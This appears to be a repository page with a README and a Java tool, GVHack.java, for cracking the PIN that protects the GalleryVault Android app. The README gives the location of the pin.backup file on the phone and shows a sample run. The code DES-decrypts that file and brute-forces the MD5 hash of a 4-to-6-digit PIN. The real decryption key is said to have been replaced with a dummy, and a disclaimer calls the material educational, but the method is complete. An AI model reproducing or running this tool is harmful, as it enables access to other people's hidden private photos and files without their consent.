GalleryVault Password Crack

README.md

GalleryVault Password Crack

GalleryVault (with over 10 million downloads) is a fantastic privacy protection app designed to easily hide and encrypt your photos, videos, and any other files you wish to keep private.

1. Compile and run the Java file (attached below).

bipin@bipin-VirtualBox:~/GVCrack$ javac GVHack.java && java GVHack 
Encrypted data from pin.backup file is missing.
Usage: java GVHack <encryptedData>
Example: java GVHack 67B4D9408C702356B507EB75C27259A8...
bipin@bipin-VirtualBox:~/GVCrack$ 

2. Copy the content of the pin.backup file from the user's smartphone, typically located at Android/data/com.thinkyeah.galleryvault/files/.galleryvault_DoNotDelete_{random_num}/backup/

3. Pass the content of pin.backup to the script.

bipin@bipin-VirtualBox:~/GVCrack$ java GVHack 67B4D9408C702356B507EB75C27259A8EFDA9B0D0F482184A38ECB622B509DA6454A464918D3BC562E8AFA32229B13A26D7552EA38318BD5C49FC16942174500005143FB60FCF340B8AAD2F32B7C2703
Key: xxxxxxx_dummy_ke
Decrypted string: 77BA9CD915C8E359D9733EDCFE9C61E5ACA92AFBE48E13207341B6BFFB7FB1622282247B
MD5 hash of password: E48E13207341B6BFFB7FB1622282247B
Cracking 4-Digit Pin
Found PIN: 1337
Program execution complete. Exiting...
bipin@bipin-VirtualBox:~/GVCrack$ 

Please note, to limit misuse, I have changed the decryption key.

Ref: https://www.slideshare.net/winhacker/gallery-vault-password-hack

Disclaimer

This code and associated instructions are provided for educational purposes only. Unauthorized use for malicious intent, including but not limited to unauthorized access to computer systems, networks, or data, is strictly prohibited. The author disclaims any responsibility for misuse of the code or any negative consequences resulting from its use. Users are advised to adhere to ethical and legal standards when utilizing or experimenting with the provided code. It is recommended to obtain explicit permission before attempting to run this code on any systems or networks that are not owned or managed by the user.

GVHack.java

import javax.crypto.Cipher;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.DESKeySpec;
import java.security.Key;
import java.security.MessageDigest;
import java.math.BigInteger;

public class GVHack {

    private static Key generateKey(String paramStr){
        if(paramStr == null || paramStr.length() < 16){
            return null;
        }
        try{
            paramStr = paramStr.substring(0, 16);
            System.out.println("Key: " + paramStr);
            DESKeySpec desKeySpec = new DESKeySpec(paramStr.getBytes());
            return SecretKeyFactory.getInstance("DES").generateSecret(desKeySpec);
        } catch (Exception e) {
            System.out.println("Error generating key: " + e.getMessage());
        }
        return null;
    }

    public static String decrypt(String keyStr, String encryptedData){
        Key key = generateKey(keyStr);
        if(key == null){
            return null;
        }
        try{
            Cipher cipher = Cipher.getInstance("DES");
            cipher.init(Cipher.DECRYPT_MODE, key);
            int j = encryptedData.length() / 2;
            byte[] bytes = new byte[j];
            int i = 0;
            while(i < j){
                bytes[i] = Integer.valueOf(encryptedData.substring(i*2, i*2+2),16).byteValue();
                i += 1;
            }
            keyStr = new String(cipher.doFinal((byte[])bytes),"UTF8");
            return keyStr;
        } catch (Exception e) {
            System.out.println("Error decrypting data: " + e.getMessage());
        }
        return null;
    }

    public static void main(String[] args) {
        
        if (args.length == 0) {
            System.out.println("Encrypted data from pin.backup file is missing.");
            System.out.println("Usage: java " + GVHack.class.getSimpleName() + " <encryptedData>");
            System.out.println("Example: java " + GVHack.class.getSimpleName() + " 67B4D9408C702356B507EB75C27259A8...");
            System.exit(1); 
        }

        String encryptedData = args[0];
        String decryptedData = decrypt("xxxxxxx_dummy_key", encryptedData);
        if (decryptedData != null) {
            System.out.println("Decrypted string: " + decryptedData);
            String pinHash = decryptedData.substring(decryptedData.length() - 32);
            System.out.println("MD5 hash of password: " + pinHash);

            int minDigits = 4;
            int maxDigits = 6;

            try {
                MessageDigest md = MessageDigest.getInstance("MD5");
                outerLoop:
                for (int digits = minDigits; digits <= maxDigits; digits++) {
                    System.out.println("Cracking " + digits + "-Digit Pin");
                    for (int v = 0; v < Math.pow(10, digits); v++) {
                        String pinAttempt = String.format("%0" + digits + "d", v);
                        byte[] messageDigest = md.digest(pinAttempt.getBytes());
                        String hashText = new BigInteger(1, messageDigest).toString(16);
                        while (hashText.length() < 32) {
                            hashText = "0" + hashText;
                        }
                        if (hashText.equals(pinHash.toLowerCase())) {
                            System.out.println("Found PIN: " + pinAttempt);
                            break outerLoop;
                        }
                    }
                }
            } catch (Exception e) {
                System.out.println("Error cracking MD5: " + e.getMessage());
            }
            System.out.println("Program execution complete. Exiting...");
        }
    }
}